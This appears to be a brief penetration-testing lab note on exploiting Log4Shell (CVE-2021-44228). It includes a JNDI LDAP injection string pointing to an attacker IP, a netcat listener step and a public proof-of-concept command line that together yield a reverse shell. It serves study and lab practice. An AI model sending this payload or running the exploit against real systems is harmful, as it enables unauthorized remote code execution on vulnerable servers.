# Log4Shell

Check this [article](https://www.tomitribe.com/blog/cve-2021-44228-log4shell-vulnerability/) for more info To check for Log4Shell exploit :

```
${jndi:ldap://10.8.0.178:4444/a}
```

Then url encode it and send through burp after intercepting:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FzQpt16723WQGTmlXTBZH%2FLog4Shell.png?alt=media&#x26;token=9f0f50f0-bceb-4ac0-9a23-408e73559955" alt=""><figcaption></figcaption></figure>

Listening on nc:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FwMpP46IWxxOTCerR4g9Q%2FLog4Shell-1.png?alt=media&#x26;token=7469e974-4b82-406c-a455-5514eadb073a" alt=""><figcaption></figcaption></figure>

We get some weird characters back.

Then we can use a [log4j-shell](https://github.com/kozmer/log4j-shell-poc/tree/main) Download [java](https://www.oracle.com/in/java/technologies/javase/javase8-archive-downloads.html) and execute

```
python3 poc.py --userip 10.8.1.208 --webport 8000 --lport 9001
```

Then send the payload:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2FJKCz25fdTvoTdDJiTDFh%2FLog4Shell-2.png?alt=media&#x26;token=821c56bc-096c-4127-bf54-b13d37a75794" alt=""><figcaption></figcaption></figure>

Sending the url encoded payload in burpsuite.

Now we get a shell back:

<figure><img src="https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2F1XUw4DRSH7BrMJYPNNDK%2FLog4Shell-3.png?alt=media&#x26;token=11828929-772d-4eaa-b65b-d4725d296f36" alt=""><figcaption></figcaption></figure>